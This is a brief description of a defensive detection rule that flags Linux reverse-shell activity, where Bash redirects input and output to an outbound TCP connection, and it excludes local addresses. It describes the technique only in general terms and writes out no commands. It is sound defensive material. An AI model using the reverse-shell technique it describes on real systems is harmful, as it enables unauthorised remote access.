This detection rule identifies potential reverse shell activity in Linux environments by monitoring network connections made by the Bash shell. The rule is designed to capture instances where the Bash process is making outbound connections to external IP addresses, indicative of an attacker attempting to gain remote access. The critical indicator examined is the execution of Bash with a command redirecting input/output to a TCP connection to a malicious or unauthorized destination. The rule specifically filters out local connections (to 127.0.0.1 and 0.0.0.0) to reduce false positives. This forms part of the broader category of attack techniques leveraged by threat actors to execute commands remotely and exfiltrate data. Key references and methodologies can be explored further in relevant cybersecurity resources regarding reverse shells.